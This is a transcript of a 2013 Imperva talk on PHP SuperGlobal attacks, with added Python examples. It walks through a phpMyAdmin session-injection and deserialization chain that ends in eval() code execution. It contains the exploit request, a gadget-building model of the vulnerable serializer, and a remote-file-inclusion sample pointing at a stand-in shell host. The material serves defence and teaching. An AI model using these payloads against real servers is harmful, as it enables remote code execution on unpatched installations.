PHP SuperGlobals: Supersized Trouble. Shelly Hershkovitz, Senior Security Analyst, Imperva. © 2013 Imperva, Inc. All rights reserved.

Presentation transcript:

Slide 1: PHP SuperGlobals: Supersized Trouble (Shelly Hershkovitz, Senior Security Analyst, Imperva)

Slide 2: Shelly Hershkovitz
- Senior Security Analyst at Imperva
- Leads the efforts to capture and analyze hacking activities
- Responsible for a number of Imperva's HII reports
- Experienced in machine learning and computer vision
- Holds a BA in Computer Science and an M.Sc. in Biomedical Engineering

Slide 3: How it all began…
- CVE-2011-2505
- Honeypots

Slide 4: HII Reports
- The Hacker Intelligence Initiative is focused on understanding how attackers operate in practice, a different approach from vulnerability research
- Data set composition: ~60 real-world applications, plus anonymous proxies
- More than 24 months of data
- Powerful analysis system that combines analytic tools with drill-down capabilities

Slide 5: Agenda
- Introduction: relevant PHP background
- An anatomy of a modern web exploit: abusing SuperGlobals
- Demo
- Additional PHP SuperGlobal attacks in the wild
- Summary & conclusions
- Q&A

Slide 6: Introduction: relevant PHP background

Slide 7: Breadth and Depth of PHP - I
- The most popular server-side programming language in the world
- And it goes from strength to strength

Slide 8: Breadth and Depth of PHP - II
- The most popular web applications are powered by PHP (source: http://www.alexa.com/topsites)

Slide 9: Outline - PHP background
- SuperGlobals
- Serialization
- Session management

Slide 10: PHP SuperGlobals
- "Local" versus "global" scopes
- Global variables: used for cross-function communication; *ANY* function may change them
- SuperGlobals: predefined array variables that are available in all scopes
- SuperGlobals hold cookies, session data, environment variables, etc.

Slide 11: PHP SuperGlobal list

  #  Variable   Definition
  1  GLOBALS    References all variables available in global scope
  2  _SERVER    Server and execution environment information
  3  _GET       HTTP GET variables
  4  _POST      HTTP POST variables
  5  _FILES     HTTP file upload variables
  6  _COOKIE    HTTP cookies
  7  _SESSION   Session variables
  8  _REQUEST   HTTP request variables
  9  _ENV       Environment variables

Slide 12: External Variable Modification
- MITRE Common Weakness Enumeration CWE-473: "A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies."
- SuperGlobals are a natural target: they exist in every PHP application and provide access to the server's core functionality

Slide 13: Serialization
- The process of converting data held in memory into a form that can be saved to a file is called "serialization"; PHP objects hook it with __sleep()
- The process of loading that saved data back into memory is called "deserialization"; PHP objects hook it with __wakeup()
- (diagram: http://www.studytonight.com/java/images/Serialization-deserialization.JPG)

Slide 14: PHP Session Management
- New user: a unique identifier is generated for the session; a cookie called PHPSESSID carrying this identifier is sent to the user; a file is created on the server, for example sess_1q8jkgkoetd3dprcb3n7mpmc4o26eili
- Returning user: the identifier from the PHPSESSID cookie selects the session file and its data is loaded back into $_SESSION

Slide 15: An Anatomy of a Modern Web Exploit: exploiting SuperGlobals

Slide 16: Outline
- phpMyAdmin
- CVE-2011-2505
- CVE-2010-3065
- Attack flow
- Demo
- Attacks in the wild

Slide 17: phpMyAdmin (PMA)
- The most popular MySQL administration tool written in PHP
- Often bundled by default in LAMP (Linux, Apache, MySQL, PHP) installations

Slide 18: Outline - PHP background mapped to the vulnerabilities
- SuperGlobals and session management: CVE-2011-2505
- Serialization and session management: CVE-2010-3065

Slide 19: CVE-2011-2505: phpMyAdmin vulnerability
- phpMyAdmin parses a given query string into the local scope
- _SESSION variables are saved in the session's file on the server
- Example: the request http://www.super.com/somePage?_SESSION[username]=bad_stuff leaves the following in the session file: username|s:9:"bad_stuff";

Slide 20: CVE-2011-2505: phpMyAdmin vulnerability
- The bug is in phpMyAdmin's "unset session" functionality
- parse_str(): parses the given query string and, when called without a result array, creates the variables in the current scope, so a query parameter named _SESSION[...] overwrites $_SESSION
- session_write_close(): writes the current $_SESSION data to the session store, so the injected values persist for the rest of the user's session

Slide 21: CVE-2011-2505: exploit
- An attacker can now craft a malicious query string carrying the _SESSION SuperGlobal
- The injected _SESSION values override the session's original values
- The new values are saved to the local session file

Slide 22: CVE-2010-3065: PHP vulnerability & exploit
- Discovered by Stefan Esser, 2010
- An attacker can write data into the session file in *ANY* format if the session variable name starts with '!': the default "php" session serializer wrote variable names verbatim, and '!' is the marker it uses for an undefined variable, so the value that follows is re-parsed as further name|value entries

Slide 23: Serialization (slide 13 shown again: serialization with __sleep(), deserialization with __wakeup())

Slide 24: PMA session deserialization: vulnerability
- When a PMA_Config object is deserialized from the session, its __wakeup() calls the load() function
- load() passes the contents of the file named by the object's source property to eval(); eval is evil, because it can be made to execute unexpected code

Slide 25: Attack flow
1. The attacker sends a 1st request to receive a session cookie
2. The attacker sends a 2nd request in which _SESSION holds: (1) malicious code; (2) a serialized PMA_Config object whose source is the session file path
3. PHP saves the session's information to the local session file
4. The attacker sends a 3rd request; PHP deserializes PMA_Config, which calls __wakeup(), which calls load(), which calls eval() on the session file named by source

Slide 26: The exploit code on the web (screenshot)

Slide 27: Attack flow (slide 25 shown again; PHP unserializes PMA_Config, whose __wakeup() calls load(), which calls eval() on the session file)

Slide 28: Guessing the session filename
- Luckily for the attacker, the location of the session file is predictable
- The file name consists of the "sess_" prefix followed by the session identifier, which the user/attacker already knows from the PHPSESSID cookie
- The directory is predictable too: the default values of session.save_path

Slide 29: Guessing the session filename: in the wild
- Multiple guesses for the directory of the same session file ("sess_19qq…")

Slide 30: The final exploit
- Now the attackers can, *FINALLY*, get their code evaluated
- The request (one line, wrapped here; the value of the payload parameter is elided on the slide):
  /phpMyAdmin/index.php?session_to_unset=123&token=86498ff0a666f808df76ffaabee9b7a3
  &_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:59:"/var/lib/php5/sess_6a3e0376fbfe9797081a3ee202ef1ca85c451a62";}}
  &_SESSION[payload]=
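The following is an added example, not code from the presentation, from PHP or from phpMyAdmin. It models the "php" session serializer of ext/session/session.c as it behaved before the CVE-2010-3065 fix, for the subset of serialize() types the slide-30 payload needs (int, string, array, object; ASCII only), and runs the chain of slides 19 to 22 and 30 through it: the attacker-supplied $_SESSION created by CVE-2011-2505 is encoded into the session file, then decoded as PHP would on the next request. Because a key beginning with '!' is the serializer's undefined-variable marker, the decoder drops the key, fails to unserialize the text that follows, and resyncs on the embedded `|xxx|`, which hands the attacker a new variable `xxx` holding the PMA_Config object. The PMA_Config class name, the source property and the session path are taken from slide 30; the payload text and the fixed encoder's failure mode (session_encode() returning false, modelled as None) are assumptions.

```python
"""Model of PHP's "php" session serializer before the CVE-2010-3065 fix
(added example; mirrors the encode/decode logic of ext/session/session.c
for a subset of serialize() types, ASCII only)."""

DELIM, UNDEF = "|", "!"   # PS_DELIMITER and PS_UNDEF_MARKER in session.c
SESSION_FILE = "/var/lib/php5/sess_6a3e0376fbfe9797081a3ee202ef1ca85c451a62"  # slide 30


def php_serialize(v):
    """serialize() for int, str, array (dict) and object (dict with '__class__')."""
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return f's:{len(v)}:"{v}";'
    if isinstance(v, dict):
        cls = v.get("__class__")
        items = {k: x for k, x in v.items() if k != "__class__"}
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in items.items())
        head = f'O:{len(cls)}:"{cls}":' if cls else "a:"
        return f"{head}{len(items)}:{{{body}}}"
    raise TypeError(type(v).__name__)


def php_unserialize(s, pos=0):
    """Parse one value at s[pos:]; return (value, end). Raises on garbage."""
    t = s[pos:pos + 2]
    if t == "i:":
        end = s.index(";", pos)
        return int(s[pos + 2:end]), end + 1
    if t == "s:":
        colon = s.index(":", pos + 2)
        n, start = int(s[pos + 2:colon]), colon + 2
        if s[start + n:start + n + 2] != '";':
            raise ValueError("bad string")
        return s[start:start + n], start + n + 2
    if t in ("a:", "O:"):
        out = {}
        if t == "O:":
            colon = s.index(":", pos + 2)
            n = int(s[pos + 2:colon])
            out["__class__"] = s[colon + 2:colon + 2 + n]
            pos = colon + 3 + n      # ':' before the property count
        else:
            pos += 1                 # ':' before the element count
        colon = s.index(":", pos + 1)
        count, p = int(s[pos + 1:colon]), colon + 2
        if s[colon + 1] != "{":
            raise ValueError("bad container")
        for _ in range(count):
            k, p = php_unserialize(s, p)
            out[k], p = php_unserialize(s, p)
        if s[p] != "}":
            raise ValueError("unterminated container")
        return out, p + 1
    raise ValueError(f"unknown type at offset {pos}")


def session_encode_vulnerable(session):
    """PHP <= 5.2.13 / 5.3.2: every key is written verbatim, '!bla' included."""
    return "".join(k + DELIM + php_serialize(v) for k, v in session.items())


def session_encode_fixed(session):
    """PHP 5.2.14 / 5.3.3 and later: a key containing '|' or '!' makes
    session_encode() fail (returns false, modelled as None); nothing is written."""
    if any(DELIM in k or UNDEF in k for k in session):
        return None
    return session_encode_vulnerable(session)


def session_decode(data):
    """'!name|' marks an undefined variable with no value; a value that fails to
    unserialize is skipped and scanning resumes at that offset."""
    out, p = {}, 0
    while (q := data.find(DELIM, p)) >= 0:
        undef = data[p] == UNDEF
        name, q = data[p + int(undef):q], q + 1
        if not undef:
            try:
                out[name], q = php_unserialize(data, q)
            except (ValueError, IndexError):
                pass                 # q unchanged: the decoder resyncs here
        p = q
    return out


def attacker_session(session_file=SESSION_FILE):
    """$_SESSION as the slide-30 request creates it via parse_str() + session_write_close()."""
    gadget = {0: {"__class__": "PMA_Config", "source": session_file}}
    return {"!bla": "|xxx|" + php_serialize(gadget),
            "payload": "PHP_CODE_PLACEHOLDER"}   # assumed; the slide elides the PHP code


def injected_variables(session_file=SESSION_FILE):
    """$_SESSION on the next request: 'xxx' now holds the PMA_Config object."""
    return session_decode(session_encode_vulnerable(attacker_session(session_file)))


if __name__ == "__main__":
    print(session_encode_vulnerable({"username": "bad_stuff"}))  # username|s:9:"bad_stuff";
    print(injected_variables()["xxx"][0])
```

Two things are worth noticing in the output. First, the session file still contains the payload text verbatim, which is all PMA_Config::load() needs when it passes that file to eval(). Second, the fix is in the encoder, not the decoder: once session_encode() refuses keys containing '|' or '!', the poisoned session is never written, and the parse_str() bug in phpMyAdmin is left with nothing to chain into, which is the "break one link" point the summary slides make.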

Slide 31: Demo

Slide 32: PMA SuperGlobal attacks in the wild
- The attack source is itself a hacked server
- It attacks (at least) two other servers
- The attacks persist for over half a year

Slide 33: A modern exploit summary: research
- Sophisticated research
- Combines multiple vulnerabilities and issues in multiple domains: phpMyAdmin (PMA) and PHP internals

Slide 34: A modern exploit summary: development
- The exploit is packed in a single, "click once" PHP script
- It automates the different attack stages
- It can be launched from infected servers to infect others

Slide 35: PHP SuperGlobal attacks in the wild

Slide 36: SuperGlobal attack targets
- RFI (Remote File Inclusion): trying to overwrite "_Server[document_root]" (that is, $_SERVER['DOCUMENT_ROOT'], which applications commonly prepend to the paths they include) so that it points to an external resource

Slide 37: SuperGlobal attack targets
- Part of general scanning against the site: Nikto, Acunetix, Nessus
- Intrusion detection system filter evasion: an alternative way to represent HTTP query parameters. In an application that pours request parameters into scope, the "_REQUEST[Itemid]=1" request parameter is equivalent to "Itemid=1", yet it evades a naive IDS signature that blacklists "Itemid=1"

Slide 38: SuperGlobal attack targets
- During May 2013: 3.5K requests that manipulated PHP SuperGlobal variables
- 27 different attack sources
- 24 web applications targeted

Slide 39: Targeted SuperGlobals
- Some SuperGlobals are targeted more than others
- The more targeted SuperGlobals are the ones that provide access to more sensitive resources

Slide 40: Summary & Conclusions

Slide 41: The importance of a positive security model
- The essence of the external variable manipulation weakness: the attacker can send external parameters with the same names as internal variables and thereby override the values of the latter
- Such external parameters are not part of the standard interface of the targeted application
- Blocking all of the internal variable names is difficult with a negative security approach (a blacklist of bad names)
- It is trivial with a positive security mechanism that specifies the allowed parameter names for each resource

Slide 42: Layered application-layer mechanisms
- Bad news: attackers can build a complex exploit by chaining several vulnerabilities together
- Good news: it is enough to break one link in the kill chain to break the chain altogether
- An application-layer solution that combines multiple detection mechanisms is crucial for effective mitigation of such complex attacks: a positive security model; a negative security model for generic issues (here, generic directory traversal protection); and specific CVE detection

Slide 43: Third-party code perils
- phpMyAdmin is a popular utility installation, often bundled with other applications
- Even if PMA is not used, its presence exposes the server to code execution attacks
- Administrators might not be aware of all the bundled software
- An "opt out" security model is needed
- One option is a Web Application Firewall (WAF) with constant updates of its security content

Slide 44: Third-party code perils (slide 43 restated: attackers target popular bundled applications such as phpMyAdmin; a vulnerable utility exposes the server even when unused; since administrators are not necessarily aware of all bundled software, an "opt out" model such as a WAF with constantly updated security content is needed)

Slide 45: SuperGlobal parameters in requests should be blocked
- There is no reason for these parameter names to be present in valid requests, so they should be banned outright
- Imperva's WAF customers received a content update to their Web Application Firewall on January 15th this year (2013)
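The three mechanisms the summary slides describe (the naive negative signature of slide 37, the per-resource positive model of slide 41 and the SuperGlobal-name ban of slide 45), written out as an added example. This is not Imperva WAF content and not phpMyAdmin code; the allowlists, the sample requests and the `.invalid` host are constructed. The check normalises each parameter name the way PHP would if the application poured it into scope (the `a[b]` prefix becomes variable `$a`, and PHP's documented conversion of '.' and ' ' in incoming names to '_'), and it percent-decodes names first, since `%5FREQUEST` is the same parameter as `_REQUEST`. A naive substring signature misses every variant; the SuperGlobal ban and the positive model catch all of them, and the positive model also catches unknown parameter names that are not SuperGlobals at all.

```python
"""Request-parameter checks for PHP SuperGlobal abuse (added example)."""
from urllib.parse import parse_qsl

SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_FILES",
                "_COOKIE", "_SESSION", "_REQUEST", "_ENV"}      # slide 11

# Positive security model: parameter names each resource may receive.
# Assumed for this example; a real deployment learns or configures them.
ALLOWED_PARAMS = {
    "/index.php": {"option", "Itemid", "id"},
    "/phpMyAdmin/index.php": {"token", "db", "table", "lang", "session_to_unset"},
}

# Negative model: the naive IDS signature from slide 37.
NEGATIVE_SIGNATURES = ("Itemid=1",)


def php_variable_name(param):
    """Name PHP gives this parameter once it lands in scope through
    register_globals, extract() or parse_str(): 'a[b][c]' is variable $a, and
    '.' and ' ' in a name become '_' (PHP manual, "Variables From External
    Sources"), so '.REQUEST[Itemid]' ends up as $_REQUEST as well."""
    return param.split("[", 1)[0].replace(".", "_").replace(" ", "_")


def analyze(target):
    """Inspect one request target ('/path?query') and return the findings."""
    path, _, query = target.partition("?")
    params = parse_qsl(query, keep_blank_values=True)   # percent-decodes names
    names = [php_variable_name(name) for name, _ in params]
    profile = ALLOWED_PARAMS.get(path)
    return {
        "path": path,
        # case-insensitive: attackers in the wild sent '_Server[document_root]'
        "superglobals": sorted({n for n in names if n.upper() in SUPERGLOBALS}),
        "unexpected": sorted({n for n in names if n not in profile}) if profile else [],
        "negative": any(sig in query for sig in NEGATIVE_SIGNATURES),
    }


def decision(findings):
    """Layered verdict: a SuperGlobal name, an unknown parameter or a
    signature hit each blocks on its own."""
    hit = findings["superglobals"] or findings["unexpected"] or findings["negative"]
    return "block" if hit else "allow"


SAMPLE_REQUESTS = [   # constructed, modelled on slides 30, 36 and 37
    "/index.php?option=com_content&Itemid=1",
    "/index.php?option=com_content&_REQUEST[Itemid]=1",
    "/index.php?option=com_content&%5FREQUEST%5BItemid%5D=1",
    "/index.php?.REQUEST[Itemid]=1",
    "/index.php?_Server[document_root]=http://evil.invalid/shell.txt%3F",
    "/phpMyAdmin/index.php?session_to_unset=123&token=86498ff0a666f808df76ffaabee9b7a3"
    "&_SESSION[!bla]=x&_SESSION[payload]=",
]


def scan(requests=SAMPLE_REQUESTS):
    """Return (target, verdict) for each request."""
    return [(t, decision(analyze(t))) for t in requests]


if __name__ == "__main__":
    for target, verdict in scan():
        f = analyze(target)
        print(f"{verdict:5} superglobals={f['superglobals']} "
              f"unexpected={f['unexpected']} signature={f['negative']}  {target}")
```

Only the first sample trips the substring signature; the SuperGlobal variants all slip past it, which is the evasion the slides observed. The positive model needs a profile per resource, so `scan()` reports "allow" for a path it has no profile for: that is the gap a negative layer such as the SuperGlobal ban is there to cover.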

Slide 46: Conclusions
- Establish a positive security model
- Use layered security mechanisms
- Beware of third-party code perils
- Block SuperGlobal parameters in requests

Slide 47: Q&A. More information in HII: http://www.imperva.com/resources/hacker_intelligence.asp
